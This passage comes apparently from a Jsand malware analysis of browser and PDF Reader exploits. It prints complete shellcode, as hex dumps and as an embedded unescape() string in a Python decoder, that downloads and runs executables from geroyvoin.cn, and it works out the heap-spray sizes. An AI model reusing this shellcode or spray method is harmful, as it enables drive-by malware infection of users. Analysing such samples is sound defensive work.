.d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/bgmnrsyz3.ex e. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 70 72 74 7a 33 2e 65 78 65 00 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/dprtz3.exe.. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 66 70 71 75 7a 33 2e 65 78 65 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/dfpquz3.exe. |
90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 65 67 6a 74 33 2e 65 78 65 00 00 | .d......@0.@T.@. .@..@.. . .=|.w. t..3.d.@0x..@..p ...X....@4.@|.X< jDZ..+....OZR..V .U.VW.s<.t3x..V. v ..3.IPA.3.6... .8.t......@..X;. u.^.F$..f..H.V.. ......_^P..}.WR. 3..[.....2.....O .u.ex.f.f.3..ad. .PhThre5$.itPTS. ...|.U.......l.. .Phon.dhurlmT..N ...U..P3.PPV.U.. ....LRP.6./p.U.[ WV......U.j...ht tp://geroyvoin.c n/1/degjt3.exe.. |
0a 0a 0a 0a 0a 0a 0a 0a 90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 62 64 66 6c 75 33 2e 65 78 65 00 00 | .........d...... @0.@T.@..@..@.. . .=|.w.t..3.d.@ 0x..@..p...X.... @4.@|.X<jDZ..+.. ..OZR..V.U.VW.s< .t3x..V.v ..3.IP A.3.6....8.t.... ..@..X;.u.^.F$.. f..H.V........_^ P..}.WR.3..[.... .2.....O.u.ex.f. f.3..ad..PhThre5 $.itPTS....|.U.. .....l...Phon.dh urlmT..N...U..P3 .PPV.U......LRP. 6./p.U.[WV...... U.j...http://ger oyvoin.cn/1/bdfl u3.exe.. |
0a 0a 0a 0a 0a 0a 0a 0a 90 64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 75 2e 65 78 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 04 8b f8 83 c4 0c b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04 93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 4c 52 50 b8 36 1a 2f 70 ff 55 04 5b 57 56 b8 98 fe 8a 0e ff 55 04 6a 00 ff d7 68 74 74 70 3a 2f 2f 67 65 72 6f 79 76 6f 69 6e 2e 63 6e 2f 31 2f 64 66 77 78 33 2e 65 78 65 00 | .........d...... @0.@T.@..@..@.. . .=|.w.t..3.d.@ 0x..@..p...X.... @4.@|.X<jDZ..+.. ..OZR..V.U.VW.s< .t3x..V.v ..3.IP A.3.6....8.t.... ..@..X;.u.^.F$.. f..H.V........_^ P..}.WR.3..[.... .2.....O.u.ex.f. f.3..ad..PhThre5 $.itPTS....|.U.. .....l...Phon.dh urlmT..N...U..P3 .PPV.U......LRP. 6./p.U.[WV...... U.j...http://ger oyvoin.cn/1/dfwx 3.exe. |
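The rows above are the unescape() strings from the evals laid out as the browser or Reader holds them in memory: each `%uXXXX` is one UTF-16 code unit stored little-endian, so `%uC033` becomes `33 c0`. Row 1 is the directshow() payload from the first eval; rows 2 to 7 are the six Reader payloads, identical apart from the filename at the tail (the two `0a 0a ...` rows carry the util_printf() NOP prefix), and the Additional malware table below shows that all of the named files, jpy5.exe included, are one binary. The following Python is an added example, not part of the Jsand report: it decodes the first eval's string into those bytes, extracts the embedded download URL, and reproduces the spray arithmetic of directshow() and the Collab exploits. It assumes the line-wrap spaces inside the unescape() string are presentational and drops them (the table shows no `20 00` pairs where they would otherwise sit).

```python
"""Added example: from the unescape() strings in the evals to the rows of the
Shellcode table, plus the heap-spray arithmetic.

Not part of the Jsand report.  The only input is the directshow() shellcode
string from the first eval, copied verbatim; its line-wrap spaces are assumed
to be presentational and are dropped before decoding.
"""
import math
import re

DIRECTSHOW_SHELLCODE = (
    " %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C"
    " %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3"
    " %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB"
    " %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3"
    " %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698"
    " %u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455"
    " %uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455"
    " %u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856"
    " %uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u6567%u6F72%u7679%u696F%u2E6E%u6E63"
    " %u312F%u622F%u6564%u7170%u3272%u652E%u6578%u0000"
)


def js_unescape_to_bytes(escaped: str) -> bytes:
    """Mirror JavaScript unescape() and then lay the string out as UTF-16LE,
    which is how it sits in the process heap: %uXXXX is one 16-bit code unit
    (%uC033 -> 33 c0), %XX is a code unit below 256 (%09 -> 09 00), and any
    other character is taken literally.  Whitespace is dropped (see above)."""
    s = re.sub(r"\s+", "", escaped)
    units = []
    pos = 0
    while pos < len(s):
        if s.startswith("%u", pos):
            units.append(int(s[pos + 2:pos + 6], 16))
            pos += 6
        elif s[pos] == "%":
            units.append(int(s[pos + 1:pos + 3], 16))
            pos += 3
        else:
            units.append(ord(s[pos]))
            pos += 1
    return b"".join(u.to_bytes(2, "little") for u in units)


def embedded_url(shellcode: bytes) -> str:
    """Each payload on this page ends with the NUL-terminated URL of the file
    it downloads; that tail is what the ASCII column of the table shows."""
    start = shellcode.find(b"http://")
    if start < 0:
        raise ValueError("no URL in shellcode")
    return shellcode[start:shellcode.index(b"\x00", start)].decode("ascii")


def directshow_spray(shellcode_units: int, headersize: int = 20,
                     limit: int = 0x30000, copies: int = 300):
    """Redo the string-length arithmetic of directshow() on integers.  Each
    round computes block + block + fillblock, which doubles (block + slackspace),
    so every array element ends up the smallest power of two >= limit minus
    the 20-unit header.  Returns (code units per element, bytes sprayed)."""
    slack = headersize + shellcode_units
    bigblock = 2                          # "%u9090%u9090" is two code units
    while bigblock < slack:
        bigblock *= 2
    block = bigblock - slack
    while block + slack < limit:
        block = block + block + slack
    element = block + shellcode_units
    return element, element * 2 * copies


def collab_spray(shellcode_units: int):
    """Redo collab_email()/collab_geticon(): fix_it() pads each element to
    0x400000 - 0x38 bytes, and the loop runs while count < (0x0c0c0c0c -
    0x400000) / 0x400000, a non-integer, so ceil() of it copies are made to
    reach the address 0x0c0c0c0c.  Returns (copies, bytes per copy)."""
    sc_len = shellcode_units * 2
    pad_len = 0x400000 - (sc_len + 0x38)
    copies = math.ceil((0x0c0c0c0c - 0x400000) / 0x400000)
    return copies, pad_len + sc_len


def analyse(escaped: str) -> dict:
    """Decode one unescape() string and summarise the spray it feeds."""
    sc = js_unescape_to_bytes(escaped)
    element_units, total = directshow_spray(len(sc) // 2)
    return {
        "bytes": len(sc),
        "hex_prefix": sc[:8].hex(" "),
        "url": embedded_url(sc),
        "spray_element_units": element_units,
        "spray_total_mib": round(total / 2 ** 20, 1),
    }


if __name__ == "__main__":
    for k, v in analyse(DIRECTSHOW_SHELLCODE).items():
        print(f"{k}: {v}")
```

For the 286-byte directshow() payload the spray is 300 elements of 0x3FFEC code units each, about 150 MiB of 0x90 sled ending in the shellcode; the Collab exploits allocate 48 elements of 4 MiB each (about 192 MiB) so that 0x0c0c0c0c lands inside the sled. Feeding any of the six Reader strings to the same function yields the corresponding table row and filename.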
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|---|---|---|
| http://geroyvoin.cn/1/bdepqr2.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/bdflu3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/bgmnrsyz3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/degjt3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/dfpquz3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/dfwx3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/dprtz3.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 | |
| http://geroyvoin.cn/1/jpy5.exe | MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit | e1e2b3389dd2e020ae2783b8c6c80a08 |